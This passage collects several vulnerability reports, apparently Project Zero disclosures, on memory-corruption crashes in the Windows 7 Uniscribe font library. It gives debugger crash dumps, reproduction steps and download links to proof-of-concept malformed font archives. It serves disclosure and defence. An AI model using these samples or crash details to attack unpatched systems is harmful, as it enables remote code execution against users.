cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010202
USP10!AssignGlyphTypes+0x79:
75235699 0fb70e          movzx   ecx,word ptr [esi]       ds:002b:095c0004=????
0:000> kb
ChildEBP RetAddr  Args to Child              
0042ef98 75233660 0042f2cc 095dfc86 0000f81e USP10!AssignGlyphTypes+0x79
0042f17c 7522f29f 42555347 0042f2e4 0042f2a8 USP10!ApplyFeatures+0x500
0042f1c8 7522f710 00000000 095e0000 095dfc78 USP10!SubstituteOtlGlyphs+0x1bf
0042f204 752213c0 0042f280 0042f2b8 0042f2e4 USP10!SubstituteOtlChars+0x220
0042f480 7521548a 0042f58c 0042f5b8 0042f5a0 USP10!HebrewEngineGetGlyphs+0x690
0042f540 7521253f 0042f58c 0042f5b8 0042f5a0 USP10!ShapingGetGlyphs+0x36a
0042f628 751e5c6f 1b01233b 095b6124 095b6318 USP10!ShlShape+0x2ef
0042f66c 751f167a 1b01233b 095b6124 095b6318 USP10!ScriptShape+0x15f
0042f6cc 751f2b14 00000000 00000000 0042f74c USP10!RenderItemNoFallback+0xfa
0042f6f8 751f2da2 00000000 00000000 0042f74c USP10!RenderItemWithFallback+0x104
0042f71c 751f4339 00000000 0042f74c 095b6124 USP10!RenderItem+0x22
0042f760 751e7a04 000004a0 00000400 1b01233b USP10!ScriptStringAnalyzeGlyphs+0x1e9
0042f778 76ca5465 1b01233b 095b6040 0000000a USP10!ScriptStringAnalyse+0x284
0042f7c4 76ca5172 1b01233b 0042fbac 0000000a LPK!LpkStringAnalyse+0xe5
0042f8c0 76ca1410 1b01233b 00000000 00000000 LPK!LpkCharsetDraw+0x332
0042f8f4 763c18b0 1b01233b 00000000 00000000 LPK!LpkDrawTextEx+0x40
0042f934 763c22bf 1b01233b 000000b0 00000000 USER32!DT_DrawStr+0x13c
0042f980 763c21f2 1b01233b 0042fbac 0042fbc0 USER32!DT_GetLineBreak+0x78
0042fa2c 763c14d4 1b01233b 00000000 0000000a USER32!DrawTextExWorker+0x255
0042fa50 763c2475 1b01233b 0042fbac ffffffff USER32!DrawTextExW+0x1e
0042fa84 013b6a5c 1b01233b 0042fbac ffffffff USER32!DrawTextW+0x4d
[...]
0:000> u
USP10!AssignGlyphTypes+0x79:
75235699 0fb70e          movzx   ecx,word ptr [esi]
7523569c b8f0ff0000      mov     eax,0FFF0h
752356a1 66214602        and     word ptr [esi+2],ax
752356a5 51              push    ecx
752356a6 8d4d0c          lea     ecx,[ebp+0Ch]
752356a9 e852420000      call    USP10!otlClassDef::getClass (75239900)
752356ae 66094602        or      word ptr [esi+2],ax
752356b2 eb09            jmp     USP10!AssignGlyphTypes+0x9d (752356bd)
0:000> dd esi
095c0004  ???????? ???????? ???????? ????????
095c0014  ???????? ???????? ???????? ????????
095c0024  ???????? ???????? ???????? ????????
095c0034  ???????? ???????? ???????? ????????
095c0044  ???????? ???????? ???????? ????????
095c0054  ???????? ???????? ???????? ????????
095c0064  ???????? ???????? ???????? ????????
095c0074  ???????? ???????? ???????? ????????
---

While the immediate crash is caused by an invalid memory read operation, the function subsequently writes to the out-of-bounds memory regions at addresses 0x752356a1 and 0x752356ae, leading to memory corruption and potential remote code execution.

The issue reproduces on Windows 7. It is easiest to reproduce with PageHeap enabled, but it is also possible to observe a crash in a default system configuration. In order to reproduce the problem with the provided samples, it might be necessary to use a custom program which displays all of the font's glyphs at various point sizes.

Attached is an archive with 3 crashing samples.


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41648.zip
HireHackking 
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1025

We have encountered a crash in the Windows Uniscribe user-mode library, in the memset() function called by USP10!otlCacheManager::GlyphsSubstituted, while trying to display text using a corrupted font file:

---
(449c.6338): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=092ac250 ebx=092ac230 ecx=00000784 edx=00000074 esi=0028ea6c edi=092affd0
eip=76bc9c8d esp=0028e978 ebp=0028e97c iopl=0         nv up ei pl nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010206
msvcrt!_VEC_memcpy+0x116:
76bc9c8d 660f7f4730      movdqa  xmmword ptr [edi+30h],xmm0 ds:002b:092b0000=????????????????????????????????
0:000> kb
ChildEBP RetAddr  Args to Child              
0028e97c 76bc9c39 092ac250 0003ff80 00000006 msvcrt!_VEC_memcpy+0x116
0028e99c 76bc9cde 092ac250 00000000 0003fff4 msvcrt!_VEC_memzero+0x36
0028e9c0 75234b58 092ac248 00000000 0003fffc msvcrt!_VEC_memzero+0x82
0028e9e0 752336a1 0028ed18 00000006 0000ffff USP10!otlCacheManager::GlyphsSubstituted+0xc8
0028ebc0 7522f29f 42555347 0028ed58 0028ece4 USP10!ApplyFeatures+0x541
0028ec0c 7522b083 00000000 092c6ffc 092c6e18 USP10!SubstituteOtlGlyphs+0x1bf
0028ec38 75223921 0028ecb4 0028ed0c 0028ed58 USP10!ShapingLibraryInternal::SubstituteOtlGlyphsWithLanguageFallback+0x23
0028eed0 7521548a 0028efdc 0028f008 0028eff0 USP10!ArabicEngineGetGlyphs+0x891
0028ef90 7521253f 0028efdc 0028f008 0028eff0 USP10!ShapingGetGlyphs+0x36a
0028f078 751e5c6f 2a0123f2 092a6124 092a6318 USP10!ShlShape+0x2ef
0028f0bc 751f167a 2a0123f2 092a6124 092a6318 USP10!ScriptShape+0x15f
0028f11c 751f2b14 00000000 00000000 0028f19c USP10!RenderItemNoFallback+0xfa
0028f148 751f2da2 00000000 00000000 0028f19c USP10!RenderItemWithFallback+0x104
0028f16c 751f4339 00000000 0028f19c 092a6124 USP10!RenderItem+0x22
0028f1b0 751e7a04 000004a0 00000400 2a0123f2 USP10!ScriptStringAnalyzeGlyphs+0x1e9
0028f1c8 76ca5465 2a0123f2 092a6040 0000000a USP10!ScriptStringAnalyse+0x284
0028f214 76ca5172 2a0123f2 0028f5fc 0000000a LPK!LpkStringAnalyse+0xe5
0028f310 76ca1410 2a0123f2 00000000 00000000 LPK!LpkCharsetDraw+0x332
0028f344 763c18b0 2a0123f2 00000000 00000000 LPK!LpkDrawTextEx+0x40
0028f384 763c22bf 2a0123f2 00000070 00000000 USER32!DT_DrawStr+0x13c
0028f3d0 763c21f2 2a0123f2 0028f5fc 0028f610 USER32!DT_GetLineBreak+0x78
0028f47c 763c14d4 2a0123f2 00000000 0000000a USER32!DrawTextExWorker+0x255
0028f4a0 763c2475 2a0123f2 0028f5fc ffffffff USER32!DrawTextExW+0x1e
0028f4d4 01336a5c 2a0123f2 0028f5fc ffffffff USER32!DrawTextW+0x4d
[...]
0:000> dd edi
092affd0  00000000 00000000 00000000 00000000
092affe0  00000000 00000000 00000000 00000000
092afff0  00000000 00000000 00000000 00000000
092b0000  ???????? ???????? ???????? ????????
092b0010  ???????? ???????? ???????? ????????
092b0020  ???????? ???????? ???????? ????????
092b0030  ???????? ???????? ???????? ????????
092b0040  ???????? ???????? ???????? ????????
---

The issue reproduces on Windows 7. It is easiest to reproduce with PageHeap enabled, but it is also possible to observe a crash in a default system configuration. In order to reproduce the problem with the provided samples, it might be necessary to use a custom program which displays all of the font's glyphs at various point sizes.

Attached is an archive with 2 crashing samples.


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41649.zip
HireHackking 
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1026&desc=2

We have encountered a crash in the Windows Uniscribe user-mode library, in the memcpy() function called by USP10!MergeLigRecords, while trying to display text using a corrupted font file:

---
(2bd0.637c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0929a000 ebx=09299fa0 ecx=00000009 edx=00000002 esi=09299fda edi=092b7914
eip=76bc9b60 esp=0015f534 ebp=0015f53c iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010202
msvcrt!memcpy+0x5a:
76bc9b60 f3a5            rep movs dword ptr es:[edi],dword ptr [esi]
0:000> kb
ChildEBP RetAddr  Args to Child              
0015f53c 751f777d 092b7914 09299fda 00000026 msvcrt!memcpy+0x5a
0015f554 751f74e9 0928ffd0 0928f9d0 0015f5f0 USP10!MergeLigRecords+0x14d
0015f5b4 751f7044 0000001a 09223d88 09233fa8 USP10!LoadTTOArabicShapeTables+0x3f9
0015f5c8 751fc5f4 a60118b0 09223d88 09216124 USP10!LoadArabicShapeTables+0xd4
0015f5e4 751ea5a0 a60118b0 0928f7d0 0000001a USP10!ArabicLoadTbl+0xd4
0015f608 751ea692 09216124 a60118b0 0000001a USP10!UpdateCache+0xb0
0015f61c 751f152d a60118b0 09216000 751f15db USP10!ScriptCheckCache+0x62
0015f628 751f15db 00000001 00000001 092162e8 USP10!GetShapeFunction+0xd
0015f660 751f2b14 00000001 00000000 0015f6e0 USP10!RenderItemNoFallback+0x5b
0015f68c 751f2da2 00000001 00000000 0015f6e0 USP10!RenderItemWithFallback+0x104
0015f6b0 751f4339 00000000 0015f6e0 09216124 USP10!RenderItem+0x22
0015f6f4 751e7a04 000004a0 00000400 a60118b0 USP10!ScriptStringAnalyzeGlyphs+0x1e9
0015f70c 76ca5465 a60118b0 09216040 0000000a USP10!ScriptStringAnalyse+0x284
0015f758 76ca5172 a60118b0 0015fb40 0000000a LPK!LpkStringAnalyse+0xe5
0015f854 76ca1410 a60118b0 00000000 00000000 LPK!LpkCharsetDraw+0x332
0015f888 763c18b0 a60118b0 00000000 00000000 LPK!LpkDrawTextEx+0x40
0015f8c8 763c22bf a60118b0 000000c0 00000000 USER32!DT_DrawStr+0x13c
0015f914 763c21f2 a60118b0 0015fb40 0015fb54 USER32!DT_GetLineBreak+0x78
0015f9c0 763c14d4 a60118b0 00000000 0000000a USER32!DrawTextExWorker+0x255
0015f9e4 763c2475 a60118b0 0015fb40 ffffffff USER32!DrawTextExW+0x1e
0015fa18 010e6a5c a60118b0 0015fb40 ffffffff USER32!DrawTextW+0x4d
[...]
0:000> dd esi
09299fda  03e003df 03df03ea 03df0382 03df0384
09299fea  03df0388 03e0038e 03e00382 03e00384
09299ffa  03e00388 ???????? ???????? ????????
0929a00a  ???????? ???????? ???????? ????????
0929a01a  ???????? ???????? ???????? ????????
0929a02a  ???????? ???????? ???????? ????????
0929a03a  ???????? ???????? ???????? ????????
0929a04a  ???????? ???????? ???????? ????????
0:000> dd edi
092b7914  ???????? ???????? ???????? ????????
092b7924  ???????? ???????? ???????? ????????
092b7934  ???????? ???????? ???????? ????????
092b7944  ???????? ???????? ???????? ????????
092b7954  ???????? ???????? ???????? ????????
092b7964  ???????? ???????? ???????? ????????
092b7974  ???????? ???????? ???????? ????????
092b7984  ???????? ???????? ???????? ????????
---

The issue reproduces on Windows 7. It is easiest to reproduce with PageHeap enabled, but it is also possible to observe a crash in a default system configuration. In order to reproduce the problem with the provided samples, it might be necessary to use a custom program which displays all of the font's glyphs at various point sizes.

Attached is a proof of concept malformed font file which triggers the crash.


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41650.zip
HireHackking 
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1027

We have encountered a crash in the Windows Uniscribe user-mode library, in an unnamed function called by USP10!ttoGetTableData, while trying to display text using a corrupted font file:

---
(46ac.5f40): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0945afce ebx=00000100 ecx=09463000 edx=00000004 esi=0945afba edi=0946006b
eip=75202dae esp=0059f634 ebp=0059f668 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010202
USP10!ttoGetTableData+0xc4e:
75202dae 668939          mov     word ptr [ecx],di        ds:002b:09463000=????
0:000> kb
ChildEBP RetAddr  Args to Child              
0059f668 75202bf8 0945af96 09462fb8 0059f688 USP10!ttoGetTableData+0xc4e
0059f690 752021b1 09462fb8 09462fb8 0945ad42 USP10!ttoGetTableData+0xa98
0059f6a4 751f7274 09458fd0 094589d0 0059f734 USP10!ttoGetTableData+0x51
0059f704 751f7044 0000001a 093f3d88 09401fa8 USP10!LoadTTOArabicShapeTables+0x184
0059f718 751fc638 51010f6c 093f3d88 0059f744 USP10!LoadArabicShapeTables+0xd4
0059f728 751fc5c8 51010f6c 094587d0 093e6124 USP10!ArabicSimpleLoadTbl+0x28
0059f744 751ea5a0 51010f6c 751e5348 0000001a USP10!ArabicLoadTbl+0xa8
0059f76c 751ea692 093e6124 51010f6c 0000001a USP10!UpdateCache+0xb0
0059f780 751f152d 51010f6c 093e6000 751f15db USP10!ScriptCheckCache+0x62
0059f78c 751f15db 00000001 00000001 00000000 USP10!GetShapeFunction+0xd
0059f7c4 751f2b14 00000001 00000001 0059f844 USP10!RenderItemNoFallback+0x5b
0059f7f0 751f2da2 00000001 00000001 0059f844 USP10!RenderItemWithFallback+0x104
0059f814 751f4339 00000001 0059f844 093e6124 USP10!RenderItem+0x22
0059f858 751e7a04 000004a0 00000400 51010f6c USP10!ScriptStringAnalyzeGlyphs+0x1e9
0059f870 76ca5465 51010f6c 093e6040 0000000a USP10!ScriptStringAnalyse+0x284
0059f8bc 76ca5172 51010f6c 0059fca4 0000000a LPK!LpkStringAnalyse+0xe5
0059f9b8 76ca1410 51010f6c 00000000 00000000 LPK!LpkCharsetDraw+0x332
0059f9ec 763c18b0 51010f6c 00000000 00000000 LPK!LpkDrawTextEx+0x40
0059fa2c 763c22bf 51010f6c 00000070 00000000 USER32!DT_DrawStr+0x13c
0059fa78 763c21f2 51010f6c 0059fca4 0059fcb8 USER32!DT_GetLineBreak+0x78
0059fb24 763c14d4 51010f6c 00000000 0000000a USER32!DrawTextExWorker+0x255
0059fb48 763c2475 51010f6c 0059fca4 ffffffff USER32!DrawTextExW+0x1e
0059fb7c 00336a5c 51010f6c 0059fca4 ffffffff USER32!DrawTextW+0x4d
[...]
0:000> dd ecx
09463000  ???????? ???????? ???????? ????????
09463010  ???????? ???????? ???????? ????????
09463020  ???????? ???????? ???????? ????????
09463030  ???????? ???????? ???????? ????????
09463040  ???????? ???????? ???????? ????????
09463050  ???????? ???????? ???????? ????????
09463060  ???????? ???????? ???????? ????????
09463070  ???????? ???????? ???????? ????????
0:000> !heap -p -a ecx
    address 09463000 found in
    _DPH_HEAP_ROOT @ 93e1000
    in busy allocation (  DPH_HEAP_BLOCK:         UserAddr         UserSize -         VirtAddr         VirtSize)
                                 93e2fa4:          9462fb8               48 -          9462000             2000
    5e3e8e89 verifier!AVrfDebugPageHeapAllocate+0x00000229
    77580f3e ntdll!RtlDebugAllocateHeap+0x00000030
    7753ab47 ntdll!RtlpAllocateHeap+0x000000c4
    774e3431 ntdll!RtlAllocateHeap+0x0000023a
    5fcca792 vrfcore!VfCoreRtlAllocateHeap+0x00000016
    751f6644 USP10!UspAllocCache+0x00000054
    751f725b USP10!LoadTTOArabicShapeTables+0x0000016b
    751f7044 USP10!LoadArabicShapeTables+0x000000d4
    751fc638 USP10!ArabicSimpleLoadTbl+0x00000028
    751fc5c8 USP10!ArabicLoadTbl+0x000000a8
    751ea5a0 USP10!UpdateCache+0x000000b0
    751ea692 USP10!ScriptCheckCache+0x00000062
    751f152d USP10!GetShapeFunction+0x0000000d
    751f2b14 USP10!RenderItemWithFallback+0x00000104
    751f2da2 USP10!RenderItem+0x00000022
    751f4339 USP10!ScriptStringAnalyzeGlyphs+0x000001e9
    751e7a04 USP10!ScriptStringAnalyse+0x00000284
    76ca5465 LPK!LpkStringAnalyse+0x000000e5
    76ca5172 LPK!LpkCharsetDraw+0x00000332
    76ca1410 LPK!LpkDrawTextEx+0x00000040
    763c18b0 USER32!DT_DrawStr+0x0000013c
    763c22bf USER32!DT_GetLineBreak+0x00000078
    763c21f2 USER32!DrawTextExWorker+0x00000255
    763c14d4 USER32!DrawTextExW+0x0000001e
    763c2475 USER32!DrawTextW+0x0000004d
[...]
---

The issue reproduces on Windows 7. It is easiest to reproduce with PageHeap enabled, but it is also possible to observe a crash in a default system configuration. In order to reproduce the problem with the provided samples, it might be necessary to use a custom program which displays all of the font's glyphs at various point sizes.

Attached is an archive with 3 crashing samples.


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41651.zip
HireHackking 
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1028

We have encountered a crash in the Windows Uniscribe user-mode library, in the USP10!UpdateGlyphFlags function, while trying to display text using a corrupted font file:

---
(5268.3b50): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00003fe0 ebx=0000ffff ecx=000007fc edx=0050ee58 esi=0000f803 edi=0931c020
eip=75230c90 esp=0050eb48 ebp=0050eb50 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010202
USP10!UpdateGlyphFlags+0x30:
75230c90 66834c380210    or      word ptr [eax+edi+2],10h ds:002b:09320002=????
0:000> kb
ChildEBP RetAddr  Args to Child              
0050eb50 752336b3 42555347 0050ee58 00000000 USP10!UpdateGlyphFlags+0x30
0050ed2c 7522f29f 42555347 0050ee68 0050ee3c USP10!ApplyFeatures+0x553
0050ed78 7522b083 00000000 00000000 00000000 USP10!SubstituteOtlGlyphs+0x1bf
0050eda4 75226d5c 0050edd4 0050ee4c 0050ee68 USP10!ShapingLibraryInternal::SubstituteOtlGlyphsWithLanguageFallback+0x23
0050f010 7521548a 0050f11c 0050f148 0050f130 USP10!GenericEngineGetGlyphs+0xa1c
0050f0d0 7521253f 0050f11c 0050f148 0050f130 USP10!ShapingGetGlyphs+0x36a
0050f1bc 751e5c6f 7901150c 09316124 09316318 USP10!ShlShape+0x2ef
0050f200 751f167a 7901150c 09316124 09316318 USP10!ScriptShape+0x15f
0050f260 751f2b14 00000000 00000000 0050f2e0 USP10!RenderItemNoFallback+0xfa
0050f28c 751f2da2 00000000 00000000 0050f2e0 USP10!RenderItemWithFallback+0x104
0050f2b0 751f4339 00000000 0050f2e0 09316124 USP10!RenderItem+0x22
0050f2f4 751e7a04 000004a0 00000400 7901150c USP10!ScriptStringAnalyzeGlyphs+0x1e9
0050f30c 76ca5465 7901150c 09316040 0000000a USP10!ScriptStringAnalyse+0x284
0050f358 76ca5172 7901150c 0050f740 0000000a LPK!LpkStringAnalyse+0xe5
0050f454 76ca1410 7901150c 00000000 00000000 LPK!LpkCharsetDraw+0x332
0050f488 763c18b0 7901150c 00000000 00000000 LPK!LpkDrawTextEx+0x40
0050f4c8 763c22bf 7901150c 00000070 00000000 USER32!DT_DrawStr+0x13c
0050f514 763c21f2 7901150c 0050f740 0050f754 USER32!DT_GetLineBreak+0x78
0050f5c0 763c14d4 7901150c 00000000 0000000a USER32!DrawTextExWorker+0x255
0050f5e4 763c2475 7901150c 0050f740 ffffffff USER32!DrawTextExW+0x1e
0050f618 001a6a5c 7901150c 0050f740 ffffffff USER32!DrawTextW+0x4d
[...]
0:000> !heap -p -a eax+edi
    address 09320000 found in
    _DPH_HEAP_ROOT @ 9311000
    in busy allocation (  DPH_HEAP_BLOCK:         UserAddr         UserSize -         VirtAddr         VirtSize)
                                 9311f38:          931c000             4000 -          931b000             6000
    5e3e8e89 verifier!AVrfDebugPageHeapAllocate+0x00000229
    77580f3e ntdll!RtlDebugAllocateHeap+0x00000030
    7753ab47 ntdll!RtlpAllocateHeap+0x000000c4
    774e3431 ntdll!RtlAllocateHeap+0x0000023a
    5dbea792 vrfcore!VfCoreRtlAllocateHeap+0x00000016
    751f68fa USP10!UspAllocStatic+0x000000aa
    751f6cea USP10!UspAcquireTempAlloc+0x0000002a
    751e8778 USP10!ScriptRecordDigitSubstitution+0x00000028
    76ca5304 LPK!ReadNLSScriptSettings+0x00000074
    76ca53b8 LPK!LpkStringAnalyse+0x00000038
    76ca5172 LPK!LpkCharsetDraw+0x00000332
    76ca1410 LPK!LpkDrawTextEx+0x00000040
    763c18b0 USER32!DT_DrawStr+0x0000013c
    763c22bf USER32!DT_GetLineBreak+0x00000078
    763c21f2 USER32!DrawTextExWorker+0x00000255
    763c14d4 USER32!DrawTextExW+0x0000001e
    763c2475 USER32!DrawTextW+0x0000004d
[...]
---

The issue reproduces on Windows 7. It is easiest to reproduce with PageHeap enabled, but it is also possible to observe a crash in a default system configuration. In order to reproduce the problem with the provided samples, it might be necessary to use a custom program which displays all of the font's glyphs at various point sizes.

Attached is an archive with 3 crashing samples.


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41652.zip
HireHackking 
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1029

We have encountered a number of crashes in the Windows Uniscribe user-mode library, while trying to display text using a corrupted font file. While crashes in this specific family take various shapes and forms, they all occur in functions directly or indirectly called by USP10!BuildFSM. An example crash excerpt is shown below:

---
(5020.4074): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=000000cc ebx=0964b270 ecx=0964c6aa edx=0038f409 esi=00000782 edi=0963d7d0
eip=751f968d esp=0038f3bc ebp=0038f468 iopl=0         nv up ei pl nz ac pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010216
USP10!BuildDynamicStatesStaticInputs+0x45d:
751f968d 668944b302      mov     word ptr [ebx+esi*4+2],ax ds:002b:0964d07a=????
0:000> kb
ChildEBP RetAddr  Args to Child              
0038f468 751f7a33 00000048 09649700 0000001a USP10!BuildDynamicStatesStaticInputs+0x45d
0038f6a0 751f7076 095d3d88 095e1fa8 0038f6cc USP10!BuildFSM+0x193
0038f6b0 751fc5f4 c10125b4 095d3d88 095c6124 USP10!LoadArabicShapeTables+0x106
0038f6cc 751ea5a0 c10125b4 0963d7d0 0000001a USP10!ArabicLoadTbl+0xd4
0038f6f0 751ea692 095c6124 c10125b4 0000001a USP10!UpdateCache+0xb0
0038f704 751f152d c10125b4 095c6000 751f15db USP10!ScriptCheckCache+0x62
0038f710 751f15db 00000001 00000001 095c62e8 USP10!GetShapeFunction+0xd
0038f748 751f2b14 00000001 00000000 0038f7c8 USP10!RenderItemNoFallback+0x5b
0038f774 751f2da2 00000001 00000000 0038f7c8 USP10!RenderItemWithFallback+0x104
0038f798 751f4339 00000000 0038f7c8 095c6124 USP10!RenderItem+0x22
0038f7dc 751e7a04 000004a0 00000400 c10125b4 USP10!ScriptStringAnalyzeGlyphs+0x1e9
0038f7f4 76ca5465 c10125b4 095c6040 0000000a USP10!ScriptStringAnalyse+0x284
0038f840 76ca5172 c10125b4 0038fc28 0000000a LPK!LpkStringAnalyse+0xe5
0038f93c 76ca1410 c10125b4 00000000 00000000 LPK!LpkCharsetDraw+0x332
0038f970 763c18b0 c10125b4 00000000 00000000 LPK!LpkDrawTextEx+0x40
0038f9b0 763c22bf c10125b4 00000040 00000000 USER32!DT_DrawStr+0x13c
0038f9fc 763c21f2 c10125b4 0038fc28 0038fc3c USER32!DT_GetLineBreak+0x78
0038faa8 763c14d4 c10125b4 00000000 0000000a USER32!DrawTextExWorker+0x255
0038facc 763c2475 c10125b4 0038fc28 ffffffff USER32!DrawTextExW+0x1e
0038fb00 01196a5c c10125b4 0038fc28 ffffffff USER32!DrawTextW+0x4d
[...]
0:000> !heap -p -a ebx
    address 0964b270 found in
    _DPH_HEAP_ROOT @ 95c1000
    in busy allocation (  DPH_HEAP_BLOCK:         UserAddr         UserSize -         VirtAddr         VirtSize)
                                 95c2ed4:          964b270             1d8c -          964b000             3000
    5dbb8e89 verifier!AVrfDebugPageHeapAllocate+0x00000229
    77580f3e ntdll!RtlDebugAllocateHeap+0x00000030
    7753ab47 ntdll!RtlpAllocateHeap+0x000000c4
    774e3431 ntdll!RtlAllocateHeap+0x0000023a
    5fcca792 vrfcore!VfCoreRtlAllocateHeap+0x00000016
    751f6644 USP10!UspAllocCache+0x00000054
    751f7975 USP10!BuildFSM+0x000000d5
    751f7076 USP10!LoadArabicShapeTables+0x00000106
    751fc5f4 USP10!ArabicLoadTbl+0x000000d4
    751ea5a0 USP10!UpdateCache+0x000000b0
    751ea692 USP10!ScriptCheckCache+0x00000062
    751f152d USP10!GetShapeFunction+0x0000000d
    751f2b14 USP10!RenderItemWithFallback+0x00000104
    751f2da2 USP10!RenderItem+0x00000022
    751f4339 USP10!ScriptStringAnalyzeGlyphs+0x000001e9
    751e7a04 USP10!ScriptStringAnalyse+0x00000284
    76ca5465 LPK!LpkStringAnalyse+0x000000e5
    76ca5172 LPK!LpkCharsetDraw+0x00000332
    76ca1410 LPK!LpkDrawTextEx+0x00000040
    763c18b0 USER32!DT_DrawStr+0x0000013c
    763c22bf USER32!DT_GetLineBreak+0x00000078
    763c21f2 USER32!DrawTextExWorker+0x00000255
    763c14d4 USER32!DrawTextExW+0x0000001e
    763c2475 USER32!DrawTextW+0x0000004d
[...]
---

The issue reproduces on Windows 7. It is easiest to reproduce with PageHeap enabled, but it is also possible to observe a crash in a default system configuration. In order to reproduce the problem with the provided samples, it might be necessary to use a custom program which displays all of the font's glyphs at various point sizes.

Attached is an archive with 2 crashing samples.


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41653.zip
HireHackking 
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1030

We have encountered a crash in the Windows Uniscribe user-mode library, in the USP10!FillAlternatesList function, while trying to request a list of alternate glyphs for a specific glyph in a corrupted font file:

---
(4bfc.c60): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0000000d ebx=0021006f ecx=00000010 edx=00000018 esi=07b4bfe8 edi=0021f620
eip=75232fe1 esp=0021f550 ebp=0021f5b8 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010202
USP10!FillAlternatesList+0x2d1:
75232fe1 66891c32        mov     word ptr [edx+esi],bx    ds:002b:07b4c000=????
0:000> kb
ChildEBP RetAddr  Args to Child              
0021f5b8 7522eb56 09312db6 00000000 00000003 USP10!FillAlternatesList+0x2d1
0021f5ec 75208b38 0021f640 0021f614 746c6161 USP10!GetOtlGlyphAlternates+0x86
0021f770 7520f214 0021f9d8 6e74616c 746c6664 USP10!OtlGetAlternateGlyphList+0x108
0021f7a0 00dc4557 30011a14 00000001 00000000 USP10!ScriptGetFontAlternateGlyphs+0xb4
[...]
---

In our test harness, we set the cMaxAlternates parameter of the ScriptGetFontAlternateGlyphs function to 10, indicating that this is the maximum number of values which can be written to the output pAlternateGlyphs array. However, the API function does not seem to respect the argument and attempts to write more data into the buffer -- in this case, 29 WORDs. The vulnerability can also be confirmed by looking at the output value of pcAlternates, which should never exceed 10 in this case, but is indeed set to 29. As a result, the bug may lead to corruption of various memory areas, including stack, heap, and static memory, depending on the type of pointer passed to the function by its caller.

The issue reproduces on Windows 7. It is easiest to reproduce with PageHeap enabled and the output buffer allocated from the heap. In order to reproduce the problem with the provided samples, it is necessary to use a custom program which calls the vulnerable API function.

Attached is a proof of concept malformed font file which triggers the crash.


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41654.zip
HireHackking 
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1031

Through fuzzing, we have discovered a number of different crashes in the Windows Uniscribe user-mode library, while trying to display text using a corrupted font file or calling documented Uniscribe API functions against such malformed fonts. In this bug, we address a variety of crashes manifested through invalid memory READ accesses. Some of them occur at page boundaries, while other at seemingly valid yet non-mapped addresses. The sheer amount of the crashes makes it very difficult for us to assess the root cause, severity and impact of each of them within a reasonable time-frame. Consequently, we have only performed basic deduplication based on the top-level address of the faulting instruction, and are reporting all of such crashes in this single bug tracker entry.

A summary of the crash locations is as follows:

--------------------------------------------------------------
1	USP10!otlMultiSubstLookup::apply+0xa8
2	USP10!otlSingleSubstLookup::applyToSingleGlyph+0x98
3	USP10!otlSingleSubstLookup::apply+0xa9
4	USP10!otlMultiSubstLookup::getCoverageTable+0x2c
5	USP10!otlMark2Array::mark2Anchor+0x18
6	USP10!GetSubstGlyph+0x2e
7	USP10!BuildTableCache+0x1ca
8	USP10!otlMkMkPosLookup::apply+0x1b4
9	USP10!otlLookupTable::markFilteringSet+0x1a
10	USP10!otlSinglePosLookup::getCoverageTable+0x12
11	USP10!BuildTableCache+0x1e7
12	USP10!otlChainingLookup::getCoverageTable+0x15
13	USP10!otlReverseChainingLookup::getCoverageTable+0x15
14	USP10!otlLigCaretListTable::coverage+0x7
15	USP10!otlMultiSubstLookup::apply+0x99
16	USP10!otlTableCacheData::FindLookupList+0x9
17	USP10!ttoGetTableData+0x4b4
18	USP10!GetSubtableCoverage+0x1ab
19	USP10!otlChainingLookup::apply+0x2d
20	USP10!MergeLigRecords+0x132
21	USP10!otlLookupTable::subTable+0x23
22	USP10!GetMaxParameter+0x53
23	USP10!ApplyLookup+0xc3
24	USP10!ApplyLookupToSingleGlyph+0x6f
25	USP10!ttoGetTableData+0x19f6
26	USP10!otlExtensionLookup::extensionSubTable+0x1d
27	USP10!ttoGetTableData+0x1a77
--------------------------------------------------------------

All of the issues reproduce successfully on Windows 7. It is highly encouraged to enable PageHeap for the test program in order to get reliable repros. It is also necessary to use a custom program which displays all of the font's glyphs at various point sizes, and additionally calls some of the Uniscribe-specific API functions.

Attached is an archive with textual crash excerpts and up to 3 samples per each unique crash.


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41655.zip
HireHackking 
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1042

